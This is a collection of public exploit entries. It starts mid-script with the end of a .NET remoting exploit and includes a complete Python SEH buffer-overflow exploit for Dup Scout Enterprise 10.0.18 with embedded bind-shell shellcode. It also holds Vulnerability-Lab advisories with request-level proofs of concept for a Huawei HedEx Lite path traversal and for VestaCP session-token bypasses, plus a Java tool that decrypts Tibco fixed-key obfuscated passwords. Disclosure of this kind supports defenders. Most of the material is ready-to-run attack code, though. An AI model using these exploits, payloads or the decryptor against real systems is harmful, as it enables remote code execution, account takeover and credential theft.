payload.replace(bytes("X"*1360, 'utf-8'), psh_shell) uri = bytes('tcp://{}:{}/Servers'.format(HOST, str(PORT)), 'utf-8') s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST,PORT)) msg = bytes() msg += b'.NET' # Header msg += b'\x01' # Version Major msg += b'\x00' # Version Minor msg += b'\x00\x00' # Operation Type msg += b'\x00\x00' # Content Distribution msg += pack('I', len(payload)) # Data Length msg += b'\x04\x00' # URI Header msg += b'\x01' # Data Type msg += b'\x01' # Encoding - UTF8 msg += pack('I', len(uri)) # URI Length msg += uri # URI msg += b'\x00\x00' # Terminating Header msg += payload # Data s.send(msg) s.close()

# Exploit Title: Dup Scout Enterprise 10.0.18 - 'sid' Remote Buffer Overflow (SEH) # Date: 2020-12-08 # Exploit Author: Andrés Roldán # Vendor Homepage: http://www.dupscout.com # Software Link: http://www.dupscout.com/downloads.html # Version: 10.0.18 # Tested on: Windows 10 Pro x64 #!/usr/bin/env python3 import socket import struct HOST = '127.0.0.1' PORT = 80 # msfvenom --platform windows --arch x86 -p windows/shell_bind_tcp -b "\x00\0x9\x0a\x0d\x20" -f python -v SHELL SHELL = b"" SHELL += b"\x29\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e" SHELL += b"\x81\x76\x0e\xfa\xfa\xc4\x90\x83\xee\xfc\xe2\xf4" SHELL += b"\x06\x12\x46\x90\xfa\xfa\xa4\x19\x1f\xcb\x04\xf4" SHELL += b"\x71\xaa\xf4\x1b\xa8\xf6\x4f\xc2\xee\x71\xb6\xb8" SHELL += b"\xf5\x4d\x8e\xb6\xcb\x05\x68\xac\x9b\x86\xc6\xbc" SHELL += b"\xda\x3b\x0b\x9d\xfb\x3d\x26\x62\xa8\xad\x4f\xc2" SHELL += b"\xea\x71\x8e\xac\x71\xb6\xd5\xe8\x19\xb2\xc5\x41" SHELL += b"\xab\x71\x9d\xb0\xfb\x29\x4f\xd9\xe2\x19\xfe\xd9" SHELL += b"\x71\xce\x4f\x91\x2c\xcb\x3b\x3c\x3b\x35\xc9\x91" SHELL += b"\x3d\xc2\x24\xe5\x0c\xf9\xb9\x68\xc1\x87\xe0\xe5" SHELL += b"\x1e\xa2\x4f\xc8\xde\xfb\x17\xf6\x71\xf6\x8f\x1b" SHELL += b"\xa2\xe6\xc5\x43\x71\xfe\x4f\x91\x2a\x73\x80\xb4" SHELL += b"\xde\xa1\x9f\xf1\xa3\xa0\x95\x6f\x1a\xa5\x9b\xca" SHELL += b"\x71\xe8\x2f\x1d\xa7\x92\xf7\xa2\xfa\xfa\xac\xe7" SHELL += b"\x89\xc8\x9b\xc4\x92\xb6\xb3\xb6\xfd\x05\x11\x28" SHELL += b"\x6a\xfb\xc4\x90\xd3\x3e\x90\xc0\x92\xd3\x44\xfb" SHELL += b"\xfa\x05\x11\xfa\xf2\xa3\x94\x72\x07\xba\x94\xd0" SHELL += b"\xaa\x92\x2e\x9f\x25\x1a\x3b\x45\x6d\x92\xc6\x90" SHELL += b"\xeb\xa6\x4d\x76\x90\xea\x92\xc7\x92\x38\x1f\xa7" SHELL += b"\x9d\x05\x11\xc7\x92\x4d\x2d\xa8\x05\x05\x11\xc7" SHELL += b"\x92\x8e\x28\xab\x1b\x05\x11\xc7\x6d\x92\xb1\xfe" SHELL += b"\xb7\x9b\x3b\x45\x92\x99\xa9\xf4\xfa\x73\x27\xc7" SHELL += b"\xad\xad\xf5\x66\x90\xe8\x9d\xc6\x18\x07\xa2\x57" SHELL += b"\xbe\xde\xf8\x91\xfb\x77\x80\xb4\xea\x3c\xc4\xd4" SHELL += b"\xae\xaa\x92\xc6\xac\xbc\x92\xde\xac\xac\x97\xc6" SHELL += b"\x92\x83\x08\xaf\x7c\x05\x11\x19\x1a\xb4\x92\xd6" SHELL += b"\x05\xca\xac\x98\x7d\xe7\xa4\x6f\x2f\x41\x34\x25" SHELL += b"\x58\xac\xac\x36\x6f\x47\x59\x6f\x2f\xc6\xc2\xec" SHELL += b"\xf0\x7a\x3f\x70\x8f\xff\x7f\xd7\xe9\x88\xab\xfa" SHELL += b"\xfa\xa9\x3b\x45" PAYLOAD = ( b'\x90' * (2482 - len(SHELL)) + SHELL + b'\xeb\x10\x90\x90' + # 0x1002071c: add esp,8 # ret 0x04 at libspp.dll (ASLR: False, Rebase: False, SafeSEH: False) struct.pack('<L', 0x1002071c) + b'\x90' * 32 + b'\xE9\x4D\xF6\xFF\xFF' + b'C' * (10000 - 2482 - 4 - 32 - len(SHELL)) ) HTTP_PAYLOAD = ( b'GET /settings&sid=' + PAYLOAD + b' HTTP/1.1\r\n' + b'Host: ' + HOST.encode() + b'\r\n\r\n' ) with socket.create_connection((HOST, PORT)) as fd: print('[+] Sending payload...') fd.sendall(HTTP_PAYLOAD) print('[+] Done. Check for a shell on port 4444.')

# Exploit Title: Huawei HedEx Lite 200R006C00SPC005 - Path Traversal # Date: 2020-11-24 # Exploit Author: Vulnerability-Lab # Vendor Homepage: https://www.huawei.com/ # Software Link: https://support.huawei.com/carrier/docview!docview?nid=SCL1000005027&path=PAN-ET/PAN-T/PAN-T-HedEx # Version: 200R006C00SPC005 Document Title: =============== Huawei HedEx Lite (DM) - Path Traversal Web Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2268 Release Date: ============= 2020-11-24 Vulnerability Laboratory ID (VL-ID): ==================================== 2268 Common Vulnerability Scoring System: ==================================== 7 Vulnerability Class: ==================== Directory- or Path-Traversal Current Estimated Price: ======================== 3.000€ - 4.000€ Product & Service Introduction: =============================== https://support.huawei.com/carrier/docview!docview?nid=SCL1000005027&path=PAN-ET/PAN-T/PAN-T-HedEx Abstract Advisory Information: ============================== A vulnerability laboratory core team researcher discovered a path traversal vulnerability in the Huawei HedEx Lite v200R006C00SPC005. Vulnerability Disclosure Timeline: ================================== 2020-11-24: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== High Authentication Type: ==================== Restricted Authentication (User Privileges) User Interaction: ================= No User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ An exploitable path traversal vulnerability has been discovered in the official Huawei HedEx Lite v200R006C00SPC005. Attackers can able to request local files or resources by remote requesting to unauthorized change a local path. Proof of Concept (PoC): ======================= The path traversal vulnerability can be exploited by remote attackers with restricted system user privileges wihtout user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Vulnerable File(s): ./newOtherManageContent.cgi [URL Path Filename] ./newStartupHedExBeeAction.cgi [URL Path Filename] ./newprehomeadvsearch.cgi [URL Path Filename] --- PoC Session Logs [POST Method Request] --- URL: http://localhost:7890/newOtherManageContent.cgi/................................windowswin.ini Path: /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1 Host: localhost:7890 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:27.0) Gecko/20100101 Firefox/27.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://localhost:7890/newindex.cgi Connection: close Content-Length: 0 --- PoC Session Logs [Response] --- HTTP/1.1 200 OK Content-Disposition: attachment; filename="win.ini" Content-Length: 1801 Content-Type: application/octet-stream;charset=utf-8 X-Frame-Options: SAMEORIGIN - ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 CMCDLLNAME32=mapi32.dll CMC=1 MAPIX=1 MAPIXVER=1.0.0.1 OLEMessaging=1 [MCI Extensions.BAK] 3g2=MPEGVideo 3gp=MPEGVideo 3gp2=MPEGVideo 3gpp=MPEGVideo aac=MPEGVideo adt=MPEGVideo adts=MPEGVideo m2t=MPEGVideo m2ts=MPEGVideo m2v=MPEGVideo m4a=MPEGVideo m4v=MPEGVideo mod=MPEGVideo mov=MPEGVideo mp4=MPEGVideo mp4v=MPEGVideo mts=MPEGVideo ts=MPEGVideo tts=MPEGVideo [Drivers.32] OLEMessaging.64=$80,$5D,$D9,$A6,$A4,$18,$A8,$AD [ChannelDownmixer] p1.bIsMultichannel=0 p1.wFormatTag=1 p1.nChannels=2 p1.dwChannelMask=63 p1.wBitsPerSample=16 p1.RequiredInputBitDepth=0 p1.bRequireInputNumberOfChannels=0 p1.RequiredInputNumberOfChannels=6 p1.bRequireInputSamplerate=0 p1.RequiredInputSamplerate=48000 p1.bRaiseMeritAndSingleInstance=1 p2.InputEnableBitmask=-1 p2.OutputEnableBitmask=-1 p2.bEnableInputGains=0 p2.bEnableOutputGains=0 p2.bEnableMasterVolume=0 p2.MasterVolumeGain=100 p2.I.FL=100 p2.I.FR=100 p2.I.FC=100 p2.I.LF=100 p2.I.BL=100 p2.I.BR=100 p2.I.FLC=100 p2.I.FRC=100 p2.I.BC=100 p2.I.SL=100 p2.I.SR=100 p2.I.TC=100 p2.I.TFL=100 p2.I.TFC=100 p2.I.TFR=100 p2.I.TBL=100 p2.I.TBC=100 p2.I.TBR=100 p2.I.bJoinFLFR=1 p2.I.bJoinBLBR=1 p2.I.bJoinFLCFRC=1 p2.I.bJoinSLSR=1 p2.I.bJoinTFLTFR=1 p2.I.bJoinTBLTBR=1 p2.O.FL=100 p2.O.FR=100 p2.O.FC=100 p2.O.LF=100 p2.O.BL=100 p2.O.BR=100 p2.O.FLC=100 p2.O.FRC=100 p2.O.BC=100 p2.O.SL=100 p2.O.SR=100 p2.O.TC=100 p2.O.TFL=100 p2.O.TFC=100 p2.O.TFR=100 p2.O.TBL=100 p2.O.TBC=100 p2.O.TBR=100 p2.O.bJoinFLFR=1 p2.O.bJoinBLBR=1 p2.O.bJoinFLCFRC=1 p2.O.bJoinSLSR=1 p2.O.bJoinTFLTFR=1 p2.O.bJoinTBLTBR=1 p3.bCustomMixMatrix=0 CustomMixMatrixFilename= LastRegisteredVersion=20000 Solution - Fix & Patch: ======================= The vulnerability can be resolved by setting restricted accessable paths. A whitelist or static paths configuration can be combined. An update is available on the huawei website provided by the manufacturer of the application via customer portal. Security Risk: ============== The security risk of the path traversal web vulnerability in the download manager software is estimated as high. Credits & Authors: ================== S.AbenMassaoud [Research Team] - https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com

# Exploit Title: VestaCP 0.9.8-26 - 'LoginAs' Insufficient Session Validation # Date: 2020-11-26 # Exploit Author: Vulnerability-Lab # Vendor Homepage: https://vestacp.com/ # Software Link: https://vestacp.com/install/ # Version: 0.9.8-26 Document Title: =============== VestaCP v0.9.8-26 - (LoginAs) Token Session Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2240 Release Date: ============= 2020-11-26 Vulnerability Laboratory ID (VL-ID): ==================================== 2240 Common Vulnerability Scoring System: ==================================== 8.3 Vulnerability Class: ==================== Insufficient Session Validation Current Estimated Price: ======================== 2.000€ - 3.000€ Product & Service Introduction: =============================== Web interface is open source php and javascript interface based on Vesta open API, it uses 381 vesta CLI calls. The GNU General Public Licence is a free, copyleft licence for software and other kinds of works. Its free to change, modify and redistribute source code. (Copy of the Homepage: https://vestacp.com/features/ & https://vestacp.com/install/ ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a insufficient session validation vulnerability in the VestaCP v0.9.8-26 hosting web-application. Affected Product(s): ==================== Vesta Product: VestaCP v0.9.8-26 - Hosting Control Panel (Web-Application) Vulnerability Disclosure Timeline: ================================== 2020-05-04: Researcher Notification & Coordination (Security Researcher) 2020-05-05: Vendor Notification (Security Department) 2020-05-07: Vendor Response/Feedback (Security Department) 2020-**-**: Vendor Fix/Patch (Service Developer Team) 2020-**-**: Security Acknowledgements (Security Department) 2020-11-26: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== High Authentication Type: ==================== Pre Auth (No Privileges or Session) User Interaction: ================= No User Interaction Disclosure Type: ================ Full Disclosure Technical Details & Description: ================================ A session token vulnerability has been discovered in the official VestaCP (Control Panel) v0.9.8-26 hosting web-application. The vulnerability allows remote attackers to gain unauthenticated or unauthorized access by client-side token manipulation. The token vulnerability is located in the function of the `LoginAs` module. Remote attackers are able to perform LoginAs requests without session token to preview there profiles. The attack requires user account privileges for manipulation of the request. The admin panel allows to request via token the local user accounts to login as via account switch. In that moment the token of the request can be removed to perform the same interaction with user privileges. Thus allows to access other account information without administrative permissions. The permission approval on login request is insufficient regarding a misconfiguration on the token implementation (client-side). Successful exploitation of the web vulnerability results in information disclosure, user or admin account compromise and elevation of privileges by further exploitation. Request Method(s): [+] GET Vulnerable Module(s): [+] /login/ Vulnerable Parameter(s): [+] token Affected Parameter(s): [+] loginas Proof of Concept (PoC): ======================= The token web vulnerability can be exploited by remote attackers with simple user privileges without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Request: Default (Download Backup) https://vestacp.localhost:8083/login/?loginas=user&token=f230a989082eec102ad5a3bb81fd0190 https://vestacp.localhost:8083/login/?loginas=admin&token=f230a989082eec102ad5a3bb81fd0190 PoC: Exploitation https://vestacp.localhost:8083/login/?loginas=user/.admin&token=null PoC: Exploit <html> <head><body> <title>VestaCP (Control Panel) v0.9.8-26 - LoginAs User/Admin PoC</title> <iframe src="https://vestacp.localhost:8083/login/?loginas=admin&token=null"%20> </body></head> <html> --- PoC Session Logs [GET] --- https://vestacp.localhost:8083/login/?loginas=[ACCOUNTNAME]&token=null Host: vestacp.localhost:8083 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive Referer: https://vestacp.localhost:8083/list/user/ Cookie: __utma=80953744.319544562.1588324200.1588338964.1588341255.6; __utmc=80953744; __utmz=80953744.1588333371.4.4.utmcsr=demo.vestacp.com|utmccn=(referral)|utmcmd=referral|utmcct=/; _ym_uid=1588324200958108010; _ym_d=1588324200; _ym_isad=2; PHPSESSID=7u5ilka7amc64ue6htfipljha7; hide_passwords=0; __utmb=80953744.5.10.1588341255; _ym_visorc_34956065=w; __utmt=1; metrika_enabled=1; _ym_metrika_enabled=1; _ym_metrika_enabled_34956065=1 - GET: HTTP/1.1 302 Moved Temporarily Server: nginx Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=120 Location: / - https://vestacp.localhost:8083/ Host: vestacp.localhost:8083 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Referer: https://vestacp.localhost:8083/list/user/ Connection: keep-alive Cookie: __utma=80953744.319544562.1588324200.1588338964.1588341255.6; __utmc=80953744; __utmz=80953744.1588333371.4.4.utmcsr=demo.vestacp.com|utmccn=(referral)|utmcmd=referral|utmcct=/; _ym_uid=1588324200958108010; _ym_d=1588324200; _ym_isad=2; PHPSESSID=7u5ilka7amc64ue6htfipljha7; hide_passwords=0; __utmb=80953744.5.10.1588341255; _ym_visorc_34956065=w; __utmt=1; metrika_enabled=1; _ym_metrika_enabled=1; _ym_metrika_enabled_34956065=1 - GET: HTTP/1.1 302 Moved Temporarily Server: nginx Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=120 - Location: /list/user/ https://vestacp.localhost:8083/list/user/ Host: vestacp.localhost:8083 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Referer: https://vestacp.localhost:8083/list/user/ Connection: keep-alive Cookie: __utma=80953744.319544562.1588324200.1588338964.1588341255.6; __utmc=80953744; __utmz=80953744.1588333371.4.4.utmcsr=demo.vestacp.com|utmccn=(referral)|utmcmd=referral|utmcct=/; _ym_uid=1588324200958108010; _ym_d=1588324200; _ym_isad=2; PHPSESSID=7u5ilka7amc64ue6htfipljha7; hide_passwords=0; __utmb=80953744.5.10.1588341255; _ym_visorc_34956065=w; __utmt=1; metrika_enabled=1; _ym_metrika_enabled=1; _ym_metrika_enabled_34956065=1 - GET: HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=120 Content-Encoding: gzip - Welcome - Logged in as user admin Reference(s): https://vestacp.localhost:8083/ https://vestacp.localhost:8083/login/ https://vestacp.localhost:8083/login/?loginas https://vestacp.localhost:8083/list/user/ Security Risk: ============== The security risk of the remote session vulnerability in the vestacp application is estimated as high. Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com

# Exploit Title: VestaCP 0.9.8-26 - 'backup' Information Disclosure # Date: 2020-11-25 # Exploit Author: Vulnerability-Lab # Vendor Homepage: https://vestacp.com/ # Software Link: https://vestacp.com/install/ # Version: 0.9.8-26 Document Title: =============== VestaCP v0.9.8-26 - Insufficient Session Validation Web Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2238 Release Date: ============= 2020-11-25 Vulnerability Laboratory ID (VL-ID): ==================================== 2238 Common Vulnerability Scoring System: ==================================== 7 Vulnerability Class: ==================== Insufficient Session Validation Current Estimated Price: ======================== 1.000€ - 2.000€ Product & Service Introduction: =============================== Web interface is open source php and javascript interface based on Vesta open API, it uses 381 vesta CLI calls. The GNU General Public Licence is a free, copyleft licence for software and other kinds of works. Its free to change, modify and redistribute source code. (Copy of the Homepage: https://vestacp.com/features/ & https://vestacp.com/install/ ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a insufficient session validation vulnerability in the VestaCP v0.9.8-26 hosting web-application. Affected Product(s): ==================== Vesta Product: VestaCP v0.9.8-26 - Hosting Control Panel (Web-Application) Vulnerability Disclosure Timeline: ================================== 2020-05-04: Researcher Notification & Coordination (Security Researcher) 2020-05-05: Vendor Notification (Security Department) 2020-05-07: Vendor Response/Feedback (Security Department) 2020-**-**: Vendor Fix/Patch (Service Developer Team) 2020-**-**: Security Acknowledgements (Security Department) 2020-11-25: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== High Authentication Type: ==================== Restricted Authentication (Guest Privileges) User Interaction: ================= No User Interaction Disclosure Type: ================ Full Disclosure Technical Details & Description: ================================ An insufficient session validation vulnerability has been discovered in the official VestaCP (Control Panel) v0.9.8-26 hosting web-application. The vulnerability allows remote attackers to gain sensitive web-application data or information without permission, authentication or authorization. The backup url includes a token parameter for the download request on backups. The mechanism is to secure that other users can only download the backup with the token to confirm the permission. The token is not required for the download and can be deattached in the client-side session request. The session validation of the backup download request is insufficient validating the request without token parameter approval. Next to that the backup uses the name of the privileges in combination with the date in a tar compressed folder. Thus allows a remote attacker with low user privileges to download the backup data without permission. Successful exploitation of the session web vulnerability results in information disclosure of the local application and dbms backup files. Request Method(s): [+] GET Vulnerable Module(s): [+] /download/backup/ Vulnerable Parameter(s): [+] token Affected Parameter(s): [+] backup Proof of Concept (PoC): ======================= The insufficient session validation vulnerability can be exploited by remote attackers with simple user privileges without user interaction. For security demonstration or to reproduce the information disclosure issue follow the provided information and steps below to continue. Request: Default (Download Backup) https://vestacp.localhost:8083/download/backup/?backup=user.2020-04-28_00-00-17.tar&token=d6f4a3a923ab5c60ef0a52995245a3d4 https://vestacp.localhost:8083/download/backup/?backup=admin.2020-04-28_00-00-17.tar&token=d6f4a3a923ab5c60ef0a52995245a3d4 PoC: Exploitation https://vestacp.localhost:8083/download/backup/?backup=[USER/ADMIN].[YYYY-MM-DD_HH-MM-SS].tar https://vestacp.localhost:8083/download/backup/?backup=user.2020-04-28_00-00-17.tar https://vestacp.localhost:8083/download/backup/?backup=admin.2020-04-28_00-00-17.tar PoC: Exploit <html> <head><body> <title>VestaCP (Control Panel) v0.9.8-26 - Information Disclosure (Backup)</title> <iframe src=https://vestacp.localhost:8083/download/backup/?backup=[USER/ADMIN].[YYYY-MM-DD_HH-MM-SS].tar> </body></head> <html> --- PoC Session Logs [GET] --- https://vestacp.localhost:8083/download/backup/?backup=user.2020-**-**_00-00-17.tar Host: vestacp.localhost:8083 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Connection: keep-alive Cookie: PHPSESSID=4neq25hga91vqrf4maktd4q073; - GET: HTTP/1.1 200 OK Server: nginx Content-Type: application/gzip Content-Length: 3891200 Connection: keep-alive Content-Disposition: attachment; filename="user.2020-**-**_00-00-17.tar"; Accept-Ranges: bytes Reference(s): https://vestacp.localhost:8083/ https://vestacp.localhost:8083/download/ https://vestacp.localhost:8083/download/backup/ https://vestacp.localhost:8083/download/backup/?backup Security Risk: ============== The security risk of the session validation web vulnerability in the vestacp web-application is estimated as high. Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com

# Exploit Title: Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption # Date: December 8th 2020 # Exploit Author: Tess Sluijter # Vendor Homepage: https://www.tibco.com # Version: 5.11x and before # Tested on: MacOS, Linux, Windows # Tibco password decryption exploit ## Background Tibco's documentation states that there are three modes of operation for this ObfuscationEngine tooling: 1. Using a custom key. 2. Using a machine key. 3. Using a fixed key. https://docs.tibco.com/pub/runtime_agent/5.11.1/doc/pdf/TIB_TRA_5.11.1_installation.pdf?id=2 This write-up pertains to #3 above. Secrets obfuscated using the Tibco fixed key can be recognized by the fact that they start with the characters #!. For example: "#!oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA". ## Issues On Tibco's forums, but also on other websites, people have already shared Java code to decrypt secrets encrypted with this fixed key. For example: * https://support.tibco.com/s/article/Tibco-KnowledgeArticle-Article-30338 * https://community.tibco.com/questions/password-encryptiondecryption * https://community.tibco.com/questions/deobfuscatedecrypt-namevaluepairpassword-gv-file * https://community.tibco.com/questions/bw6-password-decrypt * http://tibcoworldin.blogspot.com/2012/08/decrypting-password-data-type-global.html * http://tibcoshell.blogspot.com/2016/07/how-to-decrypt-encryptedmasked-password.html ## Impact Regardless of country, customer, network or version of Tibco, any secret that was obfuscated with Tibco's ObfuscationEngine can be decrypted using my Java tool. It does **not** require access to Tibco software or libraries. All you need are exfiltrated secret strings that start with the characters #!. This is not going to be fixed by Tibco, this is a design decision also used for backwards compatibility in their software. ## Instructions Compile with: javac decrypt.java Examples of running, with secrets retrieved from websites and forums: java Decrypt oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA 7474 java Decrypt BFBiFqp/qhvyxrTdjGtf/9qxlPCouNSP tibco /* comments! Compile with: javac decrypt.java Run as: java Decrypt oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA 7474 java Decrypt BFBiFqp/qhvyxrTdjGtf/9qxlPCouNSP tibco */ import java.io.ByteArrayInputStream; import java.util.Arrays; import java.util.Base64; import javax.crypto.Cipher; import javax.crypto.SecretKey; import javax.crypto.spec.SecretKeySpec; import javax.crypto.spec.IvParameterSpec; import javax.crypto.CipherInputStream; import javax.crypto.CipherOutputStream; class Decrypt { public static void main (String [] arguments) { try { byte[] keyBytes = { 28, -89, -101, -111, 91, -113, 26, -70, 98, -80, -23, -53, -118, 93, -83, -17, 28, -89, -101, -111, 91, -113, 26, -70 }; String algo = "DESede/CBC/PKCS5Padding"; String encryptedText = arguments[0]; byte[] message = Base64.getDecoder().decode(encryptedText); ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(message); Cipher decipher = Cipher.getInstance(algo); int i = decipher.getBlockSize(); byte[] ivSetup = new byte[i]; byteArrayInputStream.read(ivSetup); SecretKey key = new SecretKeySpec(keyBytes, 0, keyBytes.length, "DESede"); decipher.init(2, key, new IvParameterSpec(ivSetup)); // Magic, I admit I don't understand why this is needed. CipherInputStream cipherInputStream = new CipherInputStream(byteArrayInputStream, decipher); char[] plaintext; char[] arrayOfChar1 = new char[(message.length - i) / 2]; byte[] arrayOfByte4 = new byte[2]; byte b = 0; while (2 == cipherInputStream.read(arrayOfByte4, 0, 2)) { arrayOfChar1[b++] = (char)((char)arrayOfByte4[1] << '\b' | (char)arrayOfByte4[0]); } cipherInputStream.close(); if (b == arrayOfChar1.length) { plaintext = arrayOfChar1; } else { char[] arrayOfChar = new char[b]; System.arraycopy(arrayOfChar1, 0, arrayOfChar, 0, b); for (b = 0; b < arrayOfChar1.length; b++) { arrayOfChar1[b] = Character.MIN_VALUE; } plaintext = arrayOfChar; // End of Magic } System.out.println(plaintext); } catch (Exception ex) { System.out.println("Barf..."); System.out.println(ex); } } }

